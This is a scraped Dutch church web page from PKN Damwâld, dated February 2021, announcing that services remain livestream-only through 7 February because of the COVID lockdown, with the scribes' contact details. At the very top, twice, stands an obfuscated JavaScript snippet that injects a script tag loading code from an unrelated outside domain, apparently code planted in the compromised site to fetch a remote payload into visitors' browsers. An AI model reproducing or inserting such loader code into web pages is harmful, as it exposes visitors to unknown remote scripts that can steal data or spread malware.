;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Update coronamaatregelen - PKN Damwâld

Update coronamaatregelen

Gepubliceerd op: maandag 1 februari 2021

In verband met de lockdown die de regering per 15-12-2020 heeft ingesteld, hebben wij als moderamen van de beide kerken besloten dat de diensten in ieder geval tot en met zondag 7 februari 2021 helaas niet meer door gemeenteleden kunnen worden bezocht. Tot nu toe hebben we de adviezen van het RIVM gevolgd en het lijkt nu het verstandigst dit ook te doen.

In de persconferentie is niet expliciet genoemd dat wij als kerken geen diensten meer mogen houden met 30 personen, maar de ruimte die we krijgen heeft niet te maken met een keus van de overheid die zegt: het is verantwoord dat kerken (in tegenstelling tot kroegen en theaters) groepen mensen blijven ontvangen. Ze is alleen gebaseerd op de vrijheid van de kerken.
Met pijn in ieders hart hebben we deze beslissing genomen, wetend dat het voor een hele groep mensen zo belangrijk is om zondags samen te komen, ook al is het in een zo andere vorm dan we gewend waren. Gelukkig beschikken we over een livestream mogelijkheid en zijn de ochtenddiensten zo toch mee te beleven.

Als gevolg van deze lockdown zullen voorlopig tot en met 7 februari 2021 de diensten helaas alleen online plaatsvinden. Er zullen geen bezoekers in het kerkgebouw zijn. Enkel via de livestream en via Kabel Noord kunnen de ochtenddiensten gevolgd worden. De situatie lijkt weer op de periode in maart 2020. Dit betekent dus dat de middagdiensten ook zullen vervallen tot en met 7
februari 2021.

Houdt u vooral de Klok en Ús Tsjerkenijs in de gaten voor de laatste informatie. Mocht u uw e-mail nog niet hebben doorgegeven om deze digitaal te ontvangen: doet u dit vooral alsnog! Voor Gereformeerd bij janrreitsma@gmail.com en voor Hervormd bij hervormdambv@hotmail.com.

We wensen u allemaal Gods’ zegen toe in deze onrustige tijd, we mogen er zeker van zijn dat God voor Zijn Huis zorgt.

Als u vragen heeft: bel of mail gerust naar de scriba:
Geralda Teertstra
Tel: 0511-424766 of : hervormdambv@hotmail.com
of
Jan Reitsma
Tel: 0511-421542 of: janrreitsma@gmail.com